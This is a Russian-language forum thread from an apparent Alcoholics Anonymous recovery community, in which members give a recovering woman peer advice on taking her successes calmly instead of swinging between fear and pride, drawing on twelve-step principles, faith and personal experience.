За последний год у меня произошли определенные изменения, связанные с работой и вообще родом деятельности. Скажем так: я делаю определенные успехи. И очень благодарна за это ВС. Правда есть одно но.
Не умею просто радоваться успехам. То накатывает страх. Навроде того: "Стоит сейчас чуть подняться, как потом будет больнее падать; обязательно опозоришься; все увидят, что на самом деле ты ничего не знаешь и не умеешь". Либо гордыня и ощущение собственной крутости, от которых меня страшно колбасит и состояние совершенно предсрывное и саморазрушительное. Либо начинаю мерять себя с другими, сравнивать... В общем нет в этом никакой радости, а сплошные качели. Что с этим можно сделать?
Очень надеюсь, что не будете осуждать, потому что я сама себя уже изосуждалась. Что посоветуете? Как найти золотую середину?
Спустя 19 минут, 28 секунд (21.09.2010 - 18:16) pechora написал(а):
Спустя 1 минуту, 2 секунды (21.09.2010 - 18:17) гаспар1 написал(а):
velosipedistka привет я Андрей алкоголик
Вопрос традиционный - как часто на группы ходишь?
Вопрос традиционный - как часто на группы ходишь?
Цитата (velosipedistka @ 21.09.2010 - 17:56 ) |
Как найти золотую середину? |
Для себя я определил КАК !?, хотя было не просто
Только применяя принципы 12 шагов и традиций АА во всей моей жизни
Другими словами , я в теме 24 часа в сутки
Спустя 3 минуты, 31 секунду (21.09.2010 - 18:20) Nikola написал(а):
Дай себе разрешение РАДОВАТЬСЯ. Если не получается себе разрешить- проблема в детстве. Установка- сильно смеешься, потом плакать будешь. Это не правда. Родители обманули чтоб дитя боялось на ушах стоять. Родителям тогда спокойнее
Спустя 13 минут, 43 секунды (21.09.2010 - 18:34) velosipedistka написал(а):
Цитата (pechora @ 21.09.2010 - 18:16 ) |
Положительные перемены - воспринимай, как нормальные.. Неприятности в игнор. Все. Качелек больше нет..)) |
В смысле привыкать, что хорошее - это нормально? Кстати, очень простая, но МЫСЛЬ. Типа так и должно быть. Тогда и падать неоткуда, но и гордиться собой вроде как не из-за чего.
Спасибо!
Спустя 4 минуты, 20 секунд (21.09.2010 - 18:38) pechora написал(а):
Спустя 7 минут, 56 секунд (21.09.2010 - 18:46) velosipedistka написал(а):
Ты знаешь, там выше был комментарий и твой вслед за ним - заставили задуматься... Похоже, я в самом деле считаю, что радоваться тому, что получается у меня хорошо, нельзя, потому что это что-то из рук вон выходящее. И вот я делаю хорошо и качественно и сама не могу поверить и отношусь к себе как к невиданной зверюге. А вообще-то это нормально делать свою работу качественно и радоваться этому. Все так просто оказывается.
Спустя 1 минуту, 40 секунд velosipedistka написал(а):
Цитата (pechora @ 21.09.2010 - 18:38 ) |
Yes! (от волнения говорит не по-нашему)) ты уловила суть.. Отныне - хорошее, это норма..(читай обещания большой книги..) |
Я головой как бы понимала и читала, но сейчас, благодаря тебе, начинаю это принимать. Ух ты!
Спустя 3 минуты, 50 секунд velosipedistka написал(а):
Цитата (гаспар1 @ 21.09.2010 - 18:17 ) |
привет я Андрей алкоголик |
Привет, Андрей! Я - Настя. Грешна, на группы хожу нечасто, но так или иначе стараюсь программе уделять время каждый день. Про принципы в своей жизни - абсолютно с тобой согласна! Попробую еще больше вникать.
Спустя 1 минуту, 54 секунды (21.09.2010 - 18:48) pechora написал(а):
Цитата (velosipedistka @ 21.09.2010 - 18:42 ) |
Ух ты! |
У меня зачастую так и происходит.. - приходишь на группу и какая-то мысль из в бесформенных образов превращается в ясную цель.. услышав какую-то фразу.. Ух ты!))
Ты просто была готова это услышать и услышала))..
Не была бы - услышала бы чего нибудь другое, попросила бы тапком кинуть..
Спустя 2 минуты, 56 секунд (21.09.2010 - 18:51) velosipedistka написал(а):
Спустя 4 минуты, 34 секунды (21.09.2010 - 18:56) nadenka8791 написал(а):
velosipedistka
привет! Читаю и как будто я писала. Это уже не смешно - вторая тема, как с меня списана. Не "зацепило", а прям под каждым словом подписаться могу. Мы не двойники случайно? Я в шоке!
привет! Читаю и как будто я писала. Это уже не смешно - вторая тема, как с меня списана. Не "зацепило", а прям под каждым словом подписаться могу. Мы не двойники случайно? Я в шоке!
Спустя 2 минуты, 30 секунд (21.09.2010 - 18:58) гаспар1 написал(а):
Спустя 9 минут, 5 секунд (21.09.2010 - 19:07) velosipedistka написал(а):
Привет-привет! Нет,мы точно не двойники - я твою фотографию видела только что:))) Видимо, это какие-то общие наши "алкоголические" процессы. Спасибо тебе, что пишешь. Иногда важно понять, что то, что с тобой происходит и у других бывает. Ну и к тому же вместе легче разобраться. Меня зацепило высказывание pechora выше. Посмотри, может, и тебе отзовется. У меня прямо внутри что-то сдвинулось с привычных мест после этого осознания. Хоть и простое оно совсем.
Спустя 5 минут, 3 секунды velosipedistka написал(а):
гаспар1
Спасибо!!
Спустя 9 минут, 29 секунд (21.09.2010 - 19:17) nadenka8791 написал(а):
Цитата |
Меня зацепило высказывание pechora выше. Посмотри, может, и тебе отзовется. |
Если я скажу, что и меня зацепило, это будет правда. Ужас. Прям можно после каждого высказывания писать: и я, и меня. Я, вот честно, не нарочно и не придумываю.
Это какой-то фэ-но-мэн, чес сло!
Спустя 15 минут, 21 секунду (21.09.2010 - 19:32) Flyuroza написал(а):
Не раз замечала, что мой негатив как раз таки притягиваются моими переживаниями и страхами? Ну вроде как «закон подлости». Страх как будто говорит: «Боишься? Ну, тогда на тебе, получай!»
Просто, думаю нужно начать верить в себя. Нужно чаще радоваться своим успехам, принимать их как должное и не бояться. В принципе тебе уже писали об этом.
Спустя 27 минут, 53 секунды (21.09.2010 - 20:00) andi35 написал(а):
Ручеек
Цитата |
Ну, прям, Кашпировский. |
Печора такой, только в отличии от Кашпировского, говорит совсем мало
Спустя 6 минут, 10 секунд (21.09.2010 - 20:06) velosipedistka написал(а):
Тоже замечала это про негатив. От этого еще больше страхов:))) С сегодняшнего дня начинаю все хорошее и все успехи воспринимать как норму!)
Спустя 2 часа, 34 минуты, 31 секунду (21.09.2010 - 22:41) Валерий.С написал(а):
Цитата (velosipedistka @ 21.09.2010 - 17:56 ) |
Что посоветуете? Как найти золотую середину? |
Привет.Всё это я нашёл в одной брошюре Мелоди Битти,(День за днём из созависимости),корни
действительно из детства,дисфункциональные отношения в семье,вылились в социум,на работе,
со знакомыми,с близкими,неумение естественно проживать свои чувства и правильно их выражать.
Мне помогает приходить к равновесию выздоравливать вровень с зависимостью и созависимостью,
просто пробовать прожить один день данной установкой,посмотреть на себя,что я делаю не так.
Потом это складывается в опыт и в семье и на работе и с окружением.Найди,не пожалеешь,
там всё это чётко описано и как с этими страхами справляться на практике.
Спустя 24 минуты, 39 секунд (21.09.2010 - 23:05) Rearranger написал(а):
velosipedistka
Если, кто-то расскажет тебе - КАК ее найти - плюнь ему в глаза - ВРЕТ 200%
нельзя найти то, что не терялось......
Неприятности такая же нормальная часть жизни как и приятности - и если застревать только на чем-то Одном - то фига с два будет СЕРЕДИНА! Будет перекос а перекос он от того так и называется, потому что он КОС.....
Если, кто-то расскажет тебе - КАК ее найти - плюнь ему в глаза - ВРЕТ 200%
нельзя найти то, что не терялось......
Неприятности такая же нормальная часть жизни как и приятности - и если застревать только на чем-то Одном - то фига с два будет СЕРЕДИНА! Будет перекос а перекос он от того так и называется, потому что он КОС.....
Спустя 4 минуты, 42 секунды (21.09.2010 - 23:10) Валерий.С написал(а):
Спустя 3 минуты, 4 секунды (21.09.2010 - 23:13) Rearranger написал(а):
Валерий.С
...а можно заняться собой...
ДА! Подстриги ногти на ногах
...а можно заняться собой...
ДА! Подстриги ногти на ногах
Спустя 11 минут, 28 секунд (21.09.2010 - 23:24) Валерий.С написал(а):
То,что ты лепишь и есть дисфункциональное,негативное отношение.Можно находить серединку,
а не найти и бац навсегда там оказался!Ты вроде не новичок,впадать в такие крайности,хотя
все мы больные,ничего не попишешь,бывает и у меня.Ты предлагаешь своим постом,остаться
таким навсегда и ничего не делать-вот так предложение?!
а не найти и бац навсегда там оказался!Ты вроде не новичок,впадать в такие крайности,хотя
все мы больные,ничего не попишешь,бывает и у меня.Ты предлагаешь своим постом,остаться
таким навсегда и ничего не делать-вот так предложение?!
Спустя 8 минут, 44 секунды (21.09.2010 - 23:33) Rearranger написал(а):
Валерий.С
я просто предложил тебе заняться собой - например подстричь ногти, заметь, всё остальное сказал ТЫ, - и это именно тот взгляд которым ТЫ смотришь на мир и оцениваешь его
я просто предложил тебе заняться собой - например подстричь ногти, заметь, всё остальное сказал ТЫ, - и это именно тот взгляд которым ТЫ смотришь на мир и оцениваешь его
Спустя 10 минут, 1 секунду (21.09.2010 - 23:43) Rearranger написал(а):
Ладно, Валерий.С, не злись - просто, если долго будешь растягивать "пружинку счастья" - она лопнет и выбьет тебе глаз.... Дуализм, так сказать.
Спустя 52 секунды (21.09.2010 - 23:44) гаспар1 написал(а):
Спустя 1 минуту, 50 секунд (21.09.2010 - 23:46) Rearranger написал(а):
гаспар1
что характерно, я тоже
что характерно, я тоже
Спустя 9 минут, 28 секунд (21.09.2010 - 23:55) Валерий.С написал(а):
Цитата (Rearranger @ 21.09.2010 - 23:33 ) |
я просто предложил тебе заняться собой - например подстричь ногти |
Ну это же банально,следи за своими ногами,а не за моими.
Цитата (Rearranger @ 21.09.2010 - 23:43 ) |
не злись - просто, если долго будешь растягивать "пружинку счастья" - она лопнет |
Да я не злюсь,у тебя картинка не позволяет)))А помогает реально,глупо тебе судить о том,чего
даже в глаза не видел.И естественно установки на разные чувства,а их очень много и далеко не все хорошие,но проживать вполне возможно,только сегодня)))
Цитата (гаспар1 @ 21.09.2010 - 23:44 ) |
нифига , я выздоравливающий |
Извини,я тоже,но это не говорит о здоровье,сам понимаешь
Цитата (Ручеек @ 21.09.2010 - 23:30 ) |
Долго искал? |
Бог послал сразу после РЦ купил в Питере на группе,на ст.Василеостровская,для тебя случайно
конечно.
Спустя 37 минут, 58 секунд (22.09.2010 - 00:33) Лир-ра написал(а):
Вот рекомендации, к выпонению которых я отнеслась очень серьезно и благодаря которым в большинстве случаев смогла сохранить душевный покой который был так мне необходим.
Непосредственно к предложенныс ситуациям:
Непосредственно к предложенныс ситуациям:
Цитата (velosipedistka @ 21.09.2010 - 18:56 ) |
Не умею просто радоваться успехам. |
Благодари Бога за все в твоей жизни и твоя радость умножится.
"Стоит сейчас чуть подняться, как потом будет больнее падать; обязательно опозоришься; все увидят, что на самом деле ты ничего не знаешь и не умеешь" |
Меньше думай. Мы планируем действие, а не результат. Моя задача делать ошибки, я не идеальная.
Либо гордыня и ощущение собственной крутости, от которых меня страшно колбасит и состояние совершенно предсрывное и саморазрушительное |
Моя трезвость, это не моя заслуга, это Чудо, потому что алкоголик должен пить....
Либо начинаю мерять себя с другими, сравнивать... В общем нет в этом никакой радости, а сплошные качели. Что с этим можно сделать? |
Не в коем случае не ругать себя и не сравнвать ни с кем.( это прерагатива Бога )
Мне помогает, если применяю как таблетки, строго по рецепту.
Спустя 7 минут, 17 секунд (22.09.2010 - 00:41) nadenka8791 написал(а):
Лир-ра
Мне оказалось полезно почитать твои рекомендации. Очень на душу легло. Спасибо!
Мне оказалось полезно почитать твои рекомендации. Очень на душу легло. Спасибо!
Спустя 5 минут, 3 секунды (22.09.2010 - 00:46) velosipedistka написал(а):
Лир-ра Вот это СПАСИБО тебе!!! Все очень верно и все "ложится" на то, как чувствую и как бы хотелось жить.
Спустя 4 минуты, 4 секунды (22.09.2010 - 00:50) Лир-ра написал(а):
Спустя 6 минут, 32 секунды (22.09.2010 - 00:56) nadenka8791 написал(а):
Лир-ра
Спасибо. В программе не всегда увидишь, что в данной ситуёвине надо. А ты чётко указала именно на то, что теперь кажется очевидным. Ой, сама запуталась. Та самая ситуация, когда кажется, что сама могла б легко догадаться. В общем здорово. Я часто чувствую, что очень зашорена и не вижу дальше своего носа.
Спасибо. В программе не всегда увидишь, что в данной ситуёвине надо. А ты чётко указала именно на то, что теперь кажется очевидным. Ой, сама запуталась. Та самая ситуация, когда кажется, что сама могла б легко догадаться. В общем здорово. Я часто чувствую, что очень зашорена и не вижу дальше своего носа.
Спустя 7 часов, 44 минуты, 12 секунд (22.09.2010 - 08:40) Мейсон написал(а):
я не читал всю тему, просто про себя скажу. в чем для меня золотая середина? это я сам, любовь к себе самому.
когда я хочу повыпендриваться - это значит я не люблю себя и мне требуется за счет других повысить свою самооценку. унизив другого вроде сам выше себя чувствуешь
когда я боюсь чужой оценки, отторжения, усмешки - это опять я не люблю себя, не уверен в себе.
все это лишь является лакмусовой бумажкой, показателем того что нужно обратить внимание на себя. могу я делать только то что хочу я? могу. а могу я изменить мысли других людей? нет, ну и пускай думают что хотят. я не могу их изменить.
когда я хочу повыпендриваться - это значит я не люблю себя и мне требуется за счет других повысить свою самооценку. унизив другого вроде сам выше себя чувствуешь
когда я боюсь чужой оценки, отторжения, усмешки - это опять я не люблю себя, не уверен в себе.
все это лишь является лакмусовой бумажкой, показателем того что нужно обратить внимание на себя. могу я делать только то что хочу я? могу. а могу я изменить мысли других людей? нет, ну и пускай думают что хотят. я не могу их изменить.
Спустя 6 минут, 37 секунд (22.09.2010 - 08:47) СВВ написал(а):
Мейсон
Вот! Вот! До меня только недавно дошло, что чужие мысли я не могу изменить, что творится у другого в голове тоже не знаю.
Стало так хорошо...Но доходило очень долго, да и все еще доходит.
Вот! Вот! До меня только недавно дошло, что чужие мысли я не могу изменить, что творится у другого в голове тоже не знаю.
Стало так хорошо...Но доходило очень долго, да и все еще доходит.
Спустя 1 час, 35 минут, 7 секунд (22.09.2010 - 10:22) Rearranger написал(а):
Валерий.С
ни хрена ты не понял, ну да и ВС с тобой....
ни хрена ты не понял, ну да и ВС с тобой....
Спустя 19 минут, 55 секунд (22.09.2010 - 10:42) stariik написал(а):
Мне помогает в таких случаях 3 шаг ....Эт Верхняя сила мне дает помощь в чем то преуспеть и я за это ее благодарю.
А радоваться я себе просто разрешил без авсяких там печалей так как все что происходит со мной - все с верху от Него .А от Него разве может быть что то плохое????
Да и потом после препоручения мне стало гораздо легче жить так как сейчас самому не надо рулить а просто делать то что мне необходимо и при этом не забывать говорить что - Да исполниться Твоя воля а не моя...ВОТТ
А радоваться я себе просто разрешил без авсяких там печалей так как все что происходит со мной - все с верху от Него .А от Него разве может быть что то плохое????
Да и потом после препоручения мне стало гораздо легче жить так как сейчас самому не надо рулить а просто делать то что мне необходимо и при этом не забывать говорить что - Да исполниться Твоя воля а не моя...ВОТТ
Спустя 1 час, 33 минуты, 15 секунд (22.09.2010 - 12:15) Rearranger написал(а):
Лир-ра
я конечно ОЧЕНЬ извиняюь но "алкоголик должен пить.... " КОМУ? ЗАЧЕМ и СКОЛЬКО? В смысле должен...?
я конечно ОЧЕНЬ извиняюь но "алкоголик должен пить.... " КОМУ? ЗАЧЕМ и СКОЛЬКО? В смысле должен...?
Спустя 8 минут, 38 секунд (22.09.2010 - 12:24) Morsla написал(а):
Лир-ра
Спасибо..
Спасибо..
Спустя 17 минут, 20 секунд (22.09.2010 - 12:41) Лир-ра написал(а):
Цитата (Rearranger @ 22.09.2010 - 13:15 ) |
я конечно ОЧЕНЬ извиняюь но "алкоголик должен пить.... " КОМУ? ЗАЧЕМ и СКОЛЬКО? В смысле должен...? |
Диобетик то же никому не должен ,он просто болен....
Ну и соответственно алкоголик ... это формулировка такая -Алкоголик должен пить., а если не пьет ,это не что иное , как чудо..... .Болезнь хроничесская, прогресирующая и смертельная.
П.С . Я не сильна в словесех, но думаю и так все понятно.
Спустя 11 минут, 5 секунд (22.09.2010 - 12:52) alles написал(а):
Всю жизнь "качели" присутствуют. Как не пытался, но ровно жить не получается. Правда со временем уже не страшно раскачиватся на полную катушку... привыкаешь...
Спустя 7 минут, 7 секунд (22.09.2010 - 12:59) Nikola написал(а):
Спустя 4 минуты, 5 секунд (22.09.2010 - 13:04) alles написал(а):
Спустя 2 минуты, 18 секунд (22.09.2010 - 13:06) Rearranger написал(а):
Nikola
100% - пока нарабатывается опыт - качели воспринимаются как качели, потом намано - все правильно становится. И хорошо и плохо, и нормально - ВСЁ ВМЕСТЕ - норма, каждое состояние правильно и нормально. А ежели пыжиться и тужиться всё время быть в хорошо - то шарахнет в итоге ровно пропорционально потугам. Эти потуги такое же своеволие и глупость, как и алкогольные попытки быть центром вселенной. на самом деле - нету никаких качелей - все в голове.
alles все помрем - 500%
100% - пока нарабатывается опыт - качели воспринимаются как качели, потом намано - все правильно становится. И хорошо и плохо, и нормально - ВСЁ ВМЕСТЕ - норма, каждое состояние правильно и нормально. А ежели пыжиться и тужиться всё время быть в хорошо - то шарахнет в итоге ровно пропорционально потугам. Эти потуги такое же своеволие и глупость, как и алкогольные попытки быть центром вселенной. на самом деле - нету никаких качелей - все в голове.
alles все помрем - 500%
Спустя 48 секунд (22.09.2010 - 13:07) Nikola написал(а):
Спустя 2 минуты, 54 секунды (22.09.2010 - 13:10) alles написал(а):
Спустя 2 минуты, 19 секунд (22.09.2010 - 13:12) Nikola написал(а):
Спустя 3 минуты, 48 секунд (22.09.2010 - 13:16) Nikola написал(а):
Для меня однозначно не существует
Спустя 18 секунд (22.09.2010 - 13:16) Rearranger написал(а):
Причем тут Матросовы?
Личность - навязанный социумом стереотип
Личность - навязанный социумом стереотип
Спустя 2 минуты, 11 секунд (22.09.2010 - 13:18) Rearranger написал(а):
Nikola
не получится объяснить, там слишком много надо в сознании менять ....
не получится объяснить, там слишком много надо в сознании менять ....
Спустя 2 минуты, 34 секунды (22.09.2010 - 13:21) Nikola написал(а):
Есть разные личности. Личность- это хорошо..личностный аспект. и есть те кто стремиться раствориться в брахмане. как капля в море. а есть те кто соединяясь с морем не теряют индивидуальность
Спустя 1 минуту, 27 секунд Nikola написал(а):
Спустя 1 минуту, 27 секунд Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 14:17 ) | ||
Блажен кто верует. |
Это уже не вера для меня даже. Я УЖЕ ЗНАЮ.
Спустя 2 минуты, 3 секунды (22.09.2010 - 13:23) Rearranger написал(а):
Nikola
ну да, сначала были горы и небо, потом это исчезло, а потом опять появилось небо и горы
ну да, сначала были горы и небо, потом это исчезло, а потом опять появилось небо и горы
Спустя 3 минуты, 1 секунду (22.09.2010 - 13:26) Morsla написал(а):
Rearranger
Ты антидепрессант сам по себе... Надо тебя Запатентовать. Что скажешь?
Ты антидепрессант сам по себе... Надо тебя Запатентовать. Что скажешь?
Спустя 1 минуту, 1 секунду (22.09.2010 - 13:27) Nikola написал(а):
Цитата (Rearranger @ 22.09.2010 - 14:23 ) |
Nikola ну да, сначала были горы и небо, потом это исчезло, а потом опять появилось небо и горы |
И утыкались горы морквой, и увидели что это хорошо. да будет морква- и стал морква. Из морквы все начало быть. и без него ничего начало быть что начало быть. А почему так? Ибо восхотели так те кто горы морквами утыкал
Спустя 5 минут, 50 секунд (22.09.2010 - 13:33) Валерий.С написал(а):
Цитата (Rearranger @ 22.09.2010 - 13:06 ) |
А ежели пыжиться и тужиться всё время быть в хорошо - |
Вот именно,всё естественно,достаточно это проживать,анализировать и отпускать ситуёвину,
извлекая урок,и видеть не единственный выход-это алкогольное мышление,что выхода нет
или только такой,какой я себе рисую.Качели естественно регулируются опытом,если считаюсь
не только со своим,и не только своим пользуюсь,то и результат эффективнее.Я не пуп земли
и вокруг меня тоже люди.
Спустя 3 минуты, 16 секунд (22.09.2010 - 13:36) Nikola написал(а):
Спустя 1 минуту, 14 секунд (22.09.2010 - 13:37) Rearranger написал(а):
Morsla
я еще и эндорфин естественный
я еще и эндорфин естественный
Спустя 15 минут, 23 секунды (22.09.2010 - 13:53) Лир-ра написал(а):
Шура, я валяюсь..!!!
Спустя 2 минуты, 3 секунды Лир-ра написал(а):
Цитата (Rearranger @ 22.09.2010 - 14:37 ) |
Morsla я еще и эндорфинестественный |
И каратин....
Спустя 11 минут, 36 секунд (22.09.2010 - 14:04) Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 14:37 ) |
Валерий.С Ты прям как Горбачев говоришь. Когда видишь твой текст, то уже понимаешь, что его много, но там - ничего нет. |
Эт кому как..лично для меня- есть
Спустя 1 минуту, 55 секунд Nikola написал(а):
Цитата (Лир-ра @ 22.09.2010 - 14:53 ) |
[h я еще и эндорфинестественный [/QUOTE] И каратин.... |
Как естественное слабительное. Лучше, чем естественно напрягательное
Спустя 8 минут, 29 секунд Nikola написал(а):
Из всего написанного про золотую средину я сделал выводы:
1. Шибко не надо напрягаться в поисках той самой середины.
2.Устанавливается путем переколбашивания с одного косяка в другую.
3.Величина не статическая. Что вчера было срединой- сегодня может быть косяком.
4.Эти факторы следует учитывать в отношениях, чтоб не тащить других с свою золотую средину. Дать себе разрешение меняться. а значит перестать требовать от других соответствия моим критериям ценностей
5.Стараться придерживаться этой средины по правилу только сегодня, зная о своем несовершенстве. Ибо в нем и есть мое совершенство- в способности к совершенствованию.
Спустя 8 минут, 21 секунду (22.09.2010 - 14:12) Nikola написал(а):
Понял. А как же
Спустя 9 минут, 50 секунд (22.09.2010 - 14:22) Валерий.С написал(а):
Цитата (Nikola @ 22.09.2010 - 13:36 ) |
Маленькое противоречие..люди не вокруг тебя. они по разному |
Это и так и нет,я хорошо понимаю,что каждый живёт свою жизнь,а не мою и мне реально
жить свою жизнь,а не чью то.Но социальная часть меня говорит мне о том,что я не монах.
К тому же считаться с другими и стараться видеть их правду,вместо тупого отрицания
помогает и мне не чувствовать себя не в своей тарелке.Отрицание самая ненадёжная защита
и кратковременная.Люди живут по разному,но не по одиночке.
Спустя 33 секунды (22.09.2010 - 14:23) Morsla написал(а):
Rearranger
Цитата |
Morsla я еще и эндорфин biggrin.gif естественный rolleyes.gif |
Ну ка поди сюда...
Спустя 10 минут, 44 секунды (22.09.2010 - 14:34) Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:20 ) |
Это очень ценное качество. |
Спасибо
Спустя 3 минуты, 51 секунду Nikola написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:26 ) |
[ "Человек рождается один и умирает один". (не моя цитата). |
Вот почему в такой момент человек нуждается в Том, Кто будет ВМЕСТЕ с ним, а не просто рядом. Быть рядом с кем-то и вместе- не одно и то же. А исход одинокий- страшен, если НИКОГО не будет вместе...
Спустя 2 минуты, 17 секунд (22.09.2010 - 14:36) Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 14:37 ) |
Ты прям как Горбачев говоришь. Когда видишь твой текст, то уже понимаешь, что его много, но там - ничего нет |
Там много чего есть и Валерий знает о чем говорит,
как не странно ,я то же понимаю о чем он.
Единственное ,что такие вещи можно понять если действительно очень захотеть и приложить к этому усилия,
духовный труд, а вот так с ходу конечно невъедешь, а раз непонятно ,
то нафик все обесценить.
Я один знаю все и я один мера вещей!
Спустя 7 минут, 50 секунд (22.09.2010 - 14:44) Nikola написал(а):
Спустя 16 минут, 27 секунд (22.09.2010 - 15:00) Nikola написал(а):
Спустя 3 минуты, 6 секунд (22.09.2010 - 15:03) Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:49 ) |
Вообщем, мне по большому счету это - до лампочки. |
Мне раньше то же было до бога, так же как и ему до меня (те мои мысли),
но когда болезнь придавила, и небо с овчинку показалось,
появилась надежда ,что только он мне сможет помочь,
пришлась смирить свое вселенское Я на сколько могла и попросить помощи , а получив ее,
сделала для себя вывод , я если меняю, что то в себе ,меняется мир вокруг и мое видение его.
Спустя 16 минут, 20 секунд (22.09.2010 - 15:20) Лир-ра написал(а):
Спустя 10 минут, 23 секунды (22.09.2010 - 15:30) Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 16:19 ) |
Не от любви вселенской к нему пришла, |
Да я смертельно больной человек, у меня гордыни и еще всякого г..на выше крыше, но знаю людей чистых и хороших которые именно по зову сердца пришли.
Цитата (Ручеек @ 22.09.2010 - 16:19 ) |
А чего же он другим миллионамсикстилионам не помог? Или ты хочешь сказать, что ты лучше их? Бред. |
Нет, я не как не лучше, просто не каждый может гордыню свою себе в одно место засунуть и обратиться за помощью, ну и конечно желание изменить свою жизнь и еще усилия, ведь не себя ни Бога не обманешь.
Спустя 2 минуты, 56 секунд Лир-ра написал(а):
Цитата (Ручеек @ 22.09.2010 - 16:21 ) |
И вообще я имел в виду не биологический возраст. |
О , мне в 28 казалось что мне 98, а теперь в 40, я чувствую, что жинь только начинается и все самое прекрасное у меня впереди...
Цитата (Ручеек @ 22.09.2010 - 16:21 ) |
Фото в "обо всем" - имеется. |
Пойду гляну
Спустя 5 часов, 13 минут, 6 секунд (22.09.2010 - 20:43) velosipedistka написал(а):
Какие мы тут высокодуховные товарищи собрались:) А если серьезно, вы все мне очень помогли. Каждый привнес что-то свое и все важное.
Я сначала напряглась, когда препирательства увидела, почему-то у меня в АА всегда на это стойка, глупое максималистское такое: "здесь такого не должно быть". Но всюду жизнь:) И раз уж хорошее отныне норма, то и любые несогласия, прояснения и в принципе эмоции - тоже нормально.
Вот кстати тоже тема: как не навязывать другому свою правду, а позволять каждому иметь свое мнение.
В общем СПАСИБО! Странно так, что для многих алкоголизм чуть не благом ведь обернулся, толчком к росту.
Трезвая сегодня - ура!))
Я сначала напряглась, когда препирательства увидела, почему-то у меня в АА всегда на это стойка, глупое максималистское такое: "здесь такого не должно быть". Но всюду жизнь:) И раз уж хорошее отныне норма, то и любые несогласия, прояснения и в принципе эмоции - тоже нормально.
Вот кстати тоже тема: как не навязывать другому свою правду, а позволять каждому иметь свое мнение.
В общем СПАСИБО! Странно так, что для многих алкоголизм чуть не благом ведь обернулся, толчком к росту.
Трезвая сегодня - ура!))
Спустя 1 минуту, 17 секунд (22.09.2010 - 20:44) Валерий.С написал(а):
Цитата (Ручеек @ 22.09.2010 - 15:19 ) |
я уже вышел из того возраста - когда просто верят. Вот и все. |
Ты просто не дожил до того возраста,хотя дело не возрасте а в состоянии.Я раньше на пальцах мог сосчитать сколько раз меня просто не должно было быть,давно сбился со счёту.Будь честней,
назовись отрицанием,Ручеек нечто милое и спокойное,парадоксально звучит по отношению
к тебе,мой кумир)))Благодаря тебе я знаю каким нельзя быть,чтобы оставаться чистым и трезвым.
Твой опыт,бесценен,образец чего не надо делать
Спустя 34 минуты, 24 секунды (22.09.2010 - 21:19) pechora написал(а):
Спустя 3 минуты, 54 секунды (22.09.2010 - 21:23) velosipedistka написал(а):
Спустя 19 минут, 9 секунд (22.09.2010 - 21:42) pechora написал(а):
Цитата (velosipedistka @ 22.09.2010 - 21:23 ) |
На третьем) Но если что, я понятливая))) |
Понятно, спасибо..))
Тык вот:))
Проводя инвентаризацию по четвертому шагу..я заметил, что одни и те же свойства моего характера в разных ситуациях выступают то как недостатки, то как достоинства..
Из этого наблюдения, признанные гении, типа Энштейна)), сразу выводят теорию относительности всего и вся..))
Терь ты, как человек понятливый), можешь с легкостью отказаться от насильственного навязывания другому человеку твоего видения правды, как занятию в сущности ничего не меняющему..
Как я, так и ты, так и он будем видеть свою правду, и будем равноудалены от истины))
Но если ты покажешь тому человеку, что имея такое мировоззрение как у тебя, можно достичь лучших результатов, то он сам поменяет свою точку обзора на твою)).. без видимых усилий с твоей стороны..
Спустя 48 минут, 51 секунду (22.09.2010 - 22:31) Валерий.С написал(а):
Точно так,и для этого нужно время,время терпимости.Заботиться о себе,своём росте-это труд
над собой во взаимоотношениях и тут часть СОЦИО нуждается в тренировках.Танец на граблях.
Спустя 9 минут, 13 секунд (22.09.2010 - 22:40) velosipedistka написал(а):
pechora
Валерий.С
Да, согласна. Печора, эту самую инвентаризацию я уже провожу тоже. Можно интересно делать одновременно два шага?))) Сама понимаю, что нельзя. Но так или иначе мысли и анализ того, как и с кем за жизнь приходилось взаимодействовать, в чем моя вина и кому принесла вред - все это приходит и есть.
Кстати, в последнее время я ловлю себя на мысли, что необходимость доказывать кому-то свою правоту уходит. Но вот наблюдать как это делают другие при мне очень сложно. Хочется вмешаться и начать гурить (от слова гуру), типа что же вы делаете, опомнитесь:)))) не могу принимать чужие склоки или споры. сама, видимо, грешна в этом сильно)))
Валерий.С
Да, согласна. Печора, эту самую инвентаризацию я уже провожу тоже. Можно интересно делать одновременно два шага?))) Сама понимаю, что нельзя. Но так или иначе мысли и анализ того, как и с кем за жизнь приходилось взаимодействовать, в чем моя вина и кому принесла вред - все это приходит и есть.
Кстати, в последнее время я ловлю себя на мысли, что необходимость доказывать кому-то свою правоту уходит. Но вот наблюдать как это делают другие при мне очень сложно. Хочется вмешаться и начать гурить (от слова гуру), типа что же вы делаете, опомнитесь:)))) не могу принимать чужие склоки или споры. сама, видимо, грешна в этом сильно)))
Спустя 1 час, 13 минут, 52 секунды (22.09.2010 - 23:54) Rearranger написал(а):
Болезнь неприятия социума, ребенку не объяснили, что всё это не совсем чтобы серьезно - вот он бедолага и вовлекся в игру, считая ее единственно верной и существующей - а моск не выдержал пинка....
Спустя 2 минуты, 42 секунды (22.09.2010 - 23:56) velosipedistka написал(а):
в чем именно болезнь? в смысле не поняла к чему комментарий. к какой фразе. к моей, когда я не выдерживаю склок? или к самим склокам? или к чему?
Спустя 5 минут (23.09.2010 - 00:01) pechora написал(а):
Спустя 7 минут, 4 секунды (23.09.2010 - 00:09) Rearranger написал(а):
pechora
да уж..... шутки - обхохочешься просто
Спустя 5 минут, 21 секунду Rearranger написал(а):
velosipedistka
ну как тебе объяснить, человека заставляли с детства адаптироваться к социуму, который в принципе болен, нет нормальных социумов, в том плане, чтоб они тем или иным образом не извращали человеческую природу - кто-то выдюжил, малехо больше сил имел, кто-то нет и забухал, чтоб компенсировать радость от коллективного договора с соплеменниками.....
а учитывая еще и то что сами "учителя" воспитывались там же в том же социуме - то мама-не горюй....
да уж..... шутки - обхохочешься просто
Спустя 5 минут, 21 секунду Rearranger написал(а):
velosipedistka
ну как тебе объяснить, человека заставляли с детства адаптироваться к социуму, который в принципе болен, нет нормальных социумов, в том плане, чтоб они тем или иным образом не извращали человеческую природу - кто-то выдюжил, малехо больше сил имел, кто-то нет и забухал, чтоб компенсировать радость от коллективного договора с соплеменниками.....
